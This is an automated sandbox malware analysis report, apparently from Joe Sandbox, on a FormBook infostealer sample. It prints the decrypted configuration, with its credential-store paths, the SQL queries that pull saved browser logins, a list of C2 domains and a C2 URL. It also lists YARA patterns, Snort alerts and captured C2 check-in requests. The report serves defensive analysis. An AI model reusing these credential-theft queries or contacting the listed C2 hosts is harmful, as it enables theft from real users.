
Analysis Report J0OmHIagw8.exe

Overview

General Information

Sample Name: J0OmHIagw8.exe
Analysis ID: 339323
MD5: 92ff500a693078263908c83b4b290481
SHA1: fa5dcc6012c71490efdf320791a90c7a18958a95
SHA256: 767b1b32d4ac4cec73967590ca5b28c3e0f4d709c0773e3f4021774f15a2483a
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Tries to download HTTP data from a sinkholed server
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • J0OmHIagw8.exe (PID: 5816 cmdline: 'C:\Users\user\Desktop\J0OmHIagw8.exe' MD5: 92FF500A693078263908C83B4B290481)
    • schtasks.exe (PID: 5856 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • vbc.exe (PID: 4116 cmdline: {path} MD5: B3A917344F5610BEEC562556F11300FA)
    • vbc.exe (PID: 5800 cmdline: {path} MD5: B3A917344F5610BEEC562556F11300FA)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 3448 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 5864 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x79e0", "KEY1_OFFSET 0x1bbc8", "CONFIG SIZE : 0xc1", "CONFIG OFFSET 0x1bc99", "URL SIZE : 24", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa0e749e3", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715030", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01355", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", 
"0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", 
".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "slgacha.com", "oohdough.com", "6983ylc.com", "aykassociate.com", "latin-hotspot.com", "starrockindia.com", "beamsubway.com", "queensboutique1000.com", "madbaddie.com", "bhoomimart.com", "ankitparivar.com", "aldanasanchezmx.com", "citest1597669833.com", "cristianofreitas.com", "myplantus.com", "counterfeitmilk.com", "8xf39.com", "pregnantwomens.com", "yyyut6.com", "stnanguo.com", "fessusesefsee.com", "logansshop.net", "familydalmatianhomes.com", "accessible.legal", "epicmassiveconcepts.com", "indianfactopedia.com", "exit-divorce.com", "colliapse.com", "nosishop.com", "hayat-aljowaily.com", "soundon.events", "previnacovid19-br.com", "traptlongview.com", "splendidhotelspa.com", "masterzushop.com", "ednevents.com", "studentdividers.com", "treningi-enduro.com", "hostingcoaster.com", "gourmetgroceriesfast.com", "thesouthbeachlife.com", "teemergin.com", "fixmygearfast.com", "arb-invest.com", "shemaledreamz.com", "1819apparel.com", "thedigitalsatyam.com", "alparmuhendislik.com", "distinctmusicproductions.com", "procreditexpert.com", "insights4innovation.com", "jzbtl.com", "1033325.com", "sorteocamper.info", "scheherazadelegault.com", "glowportraiture.com", "cleitstaapps.com", "globepublishers.com", "stattests.com", "brainandbodystrengthcoach.com", "magenx2.info", 
"escaparati.com", "wood-decor24.com", "travelnetafrica.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.herbmedia.net/csv8/\u0000"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(17 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.vbc.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.vbc.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.vbc.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x158b9:$sqlite3step: 68 34 1C 7B E1
  • 0x159cc:$sqlite3step: 68 34 1C 7B E1
  • 0x158e8:$sqlite3text: 68 38 2A 90 C5
  • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
  • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
5.2.vbc.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.vbc.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 further entry not shown)

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\J0OmHIagw8.exe', ParentImage: C:\Users\user\Desktop\J0OmHIagw8.exe, ParentProcessId: 5816, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp', ProcessId: 5856

Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: http://www.fessusesefsee.com/csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT | Avira URL Cloud: Label: phishing
Source: http://www.logansshop.net/csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhT | Avira URL Cloud: Label: malware
Found malware configuration
Source: 5.2.vbc.exe.400000.0.unpack | Malware Configuration Extractor: FormBook (configuration listed in full under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: J0OmHIagw8.exe | Virustotal: Detection: 31%
Yara detected FormBook
Source: Yara match | File source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: J0OmHIagw8.exe | Joe Sandbox ML: detected
Source: 5.2.vbc.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: J0OmHIagw8.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: J0OmHIagw8.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: control.pdb source: vbc.exe, 00000005.00000002.275978124.0000000005108000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, control.exe, 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, control.exe
Source: Binary string: vbc.pdb source: control.exe, 00000008.00000002.576699588.00000000055C7000.00000004.00000001.sdmp
Source: Binary string: control.pdbUGP source: vbc.exe, 00000005.00000002.275978124.0000000005108000.00000004.00000020.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 4x nop then pop ebx | 5_2_00406A94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 4x nop then pop edi | 5_2_0040C3D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 4x nop then pop edi | 5_2_0040C3AE
Source: C:\Windows\SysWOW64\control.exe | Code function: 4x nop then pop edi | 8_2_030FC3AE
Source: C:\Windows\SysWOW64\control.exe | Code function: 4x nop then pop edi | 8_2_030FC3D7
Source: C:\Windows\SysWOW64\control.exe | Code function: 4x nop then pop ebx | 8_2_030F6A96

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 173.234.175.134:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 173.234.175.134:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 173.234.175.134:80
Source: Traffic | Snort IDS: 2016803 ET TROJAN Known Sinkhole Response Header 45.77.226.209:80 -> 192.168.2.3:49755
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 142.44.212.169:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 142.44.212.169:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 142.44.212.169:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49761 -> 192.155.166.181:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49761 -> 192.155.166.181:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49761 -> 192.155.166.181:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49765 -> 205.134.254.189:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49765 -> 205.134.254.189:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49765 -> 205.134.254.189:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49769 -> 173.234.175.134:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49769 -> 173.234.175.134:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49769 -> 173.234.175.134:80
Source: Traffic | Snort IDS: 2016803 ET TROJAN Known Sinkhole Response Header 45.77.226.209:80 -> 192.168.2.3:49771
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49772 -> 142.44.212.169:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49772 -> 142.44.212.169:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49772 -> 142.44.212.169:80
Tries to download HTTP data from a sinkholed server
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 13 Jan 2021 20:16:25 GMT | Server: X-SinkHole: Malware DNS SinkHole Server | Content-Length: 307 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 73 76 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 58 2d 53 69 6e 6b 48 6f 6c 65 3a 20 4d 61 6c 77 61 72 65 20 44 4e 53 20 53 69 6e 6b 48 6f 6c 65 20 53 65 72 76 65 72 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 65 73 73 75 73 65 73 65 66 73 65 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /csv8/ was not found on this server.</p><hr><address>X-SinkHole: Malware DNS SinkHole Server Server at www.fessusesefsee.com Port 80</address></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 13 Jan 2021 20:17:53 GMT | Server: X-SinkHole: Malware DNS SinkHole Server | Content-Length: 307 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 73 76 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 58 2d 53 69 6e 6b 48 6f 6c 65 3a 20 4d 61 6c 77 61 72 65 20 44 4e 53 20 53 69 6e 6b 48 6f 6c 65 20 53 65 72 76 65 72 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 65 73 73 75 73 65 73 65 66 73 65 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /csv8/ was not found on this server.</p><hr><address>X-SinkHole: Malware DNS SinkHole Server Server at www.fessusesefsee.com Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT HTTP/1.1Host: www.travelnetafrica.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT HTTP/1.1Host: www.fessusesefsee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT HTTP/1.1Host: www.queensboutique1000.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=qn4X4+yxbbSsDYaEiiQ2PWd8LlsUN5GHqTXva27qpzu+WFndrUbREk96g9Cvik6UddJD&jBZd=KnhT HTTP/1.1Host: www.studentdividers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhT HTTP/1.1Host: www.logansshop.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
